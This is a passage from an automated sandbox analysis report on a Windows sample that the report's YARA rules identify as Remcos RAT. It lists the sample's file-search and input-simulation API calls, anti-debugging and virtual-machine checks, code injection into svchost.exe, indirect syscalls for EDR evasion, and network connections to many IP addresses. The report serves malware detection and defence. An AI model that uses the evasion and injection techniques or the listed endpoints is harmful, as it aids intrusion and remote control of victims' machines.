              Source: C:\Windows\System32\msdtc.exe TID: 7692Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe TID: 7912Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452492
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442886
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_004788BD
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,1_2_004339B6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,1_2_0045CAFA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00431A86
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD27
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045DE8F FindFirstFileW,FindClose,1_2_0045DE8F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00452492
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00442886
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004788BD
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004339B6
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,3_2_0045CAFA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00431A86
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,3_2_0044BD27
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045DE8F FindFirstFileW,FindClose,3_2_0045DE8F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_0044BF8B
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeThread delayed: delay time: 60000
              Source: C:\Windows\System32\msdtc.exeThread delayed: delay time: 60000
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeThread delayed: delay time: 60000
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: alg.exe, 00000008.00000003.2431200193.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1942758358.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1935362929.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2644014392.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2250815667.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2458126956.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2293661873.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1971647597.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1957305293.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1890190874.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2314296251.0000000000573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00l
              Source: Spectrum.exe, 0000001E.00000003.2022230753.00000000005F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeAPI call chain: ExitProcess graph end nodegraph_0-65874
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end nodegraph_1-84818
              Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0493B288 mov eax, dword ptr fs:[00000030h]0_2_0493B288
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0493B2E8 mov eax, dword ptr fs:[00000030h]0_2_0493B2E8
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_04939C38 mov eax, dword ptr fs:[00000030h]0_2_04939C38
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_04C104C8 mov eax, dword ptr fs:[00000030h]1_2_04C104C8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_04C10528 mov eax, dword ptr fs:[00000030h]1_2_04C10528
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_04C0EE78 mov eax, dword ptr fs:[00000030h]1_2_04C0EE78
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_04CE6570 mov eax, dword ptr fs:[00000030h]3_2_04CE6570
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_04CE6510 mov eax, dword ptr fs:[00000030h]3_2_04CE6510
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_04CE4EC0 mov eax, dword ptr fs:[00000030h]3_2_04CE4EC0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04CD94D0 mov eax, dword ptr fs:[00000030h]5_2_04CD94D0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04CD7E80 mov eax, dword ptr fs:[00000030h]5_2_04CD7E80
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 5_2_04CD9530 mov eax, dword ptr fs:[00000030h]5_2_04CD9530
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 18_2_04C17558 mov eax, dword ptr fs:[00000030h]18_2_04C17558
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 18_2_04C174F8 mov eax, dword ptr fs:[00000030h]18_2_04C174F8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 18_2_04C15EA8 mov eax, dword ptr fs:[00000030h]18_2_04C15EA8
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0041F250 SetUnhandledExceptionFilter,1_2_0041F250
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A208
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00417DAA
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0041F250 SetUnhandledExceptionFilter,3_2_0041F250
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041A208
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00417DAA

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.254.94.185 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.10.160.212 6622Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.246.200.160 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.234.222.143 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.211.97.45 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.164.78.200 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.13.20 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 44.213.104.86 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.214.228.140 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.244.188.177 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.251.16.150 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.129.31.212 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.112.184.197 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.141.10.107 80Jump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQuerySystemInformation: Indirect: 0x9B8462
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9B
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9F
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeNtQuerySystemInformation: Indirect: 0xB98462
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtAdjustPrivilegesToken: Indirect: 0x9B864C
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeNtAdjustPrivilegesToken: Indirect: 0xB9864C
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AEF008Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3EB008
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tyRPPK48Mk.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: name.exeBinary or memory string: Shell_TrayWnd
              Source: tyRPPK48Mk.exe, 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp, tyRPPK48Mk.exe, 00000000.00000000.1770251172.0000000000482000.00000002.00000001.01000000.00000003.sdmp, tyRPPK48Mk.exe, 00000000.00000003.1783849025.00000000058B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTDA9F.tmp VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTDAAF.tmp VolumeInformation
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_00472C3F GetUserNameW,1_2_00472C3F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.1959006729.0000000000822000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTR
              Source: name.exeBinary or memory string: WIN_XP
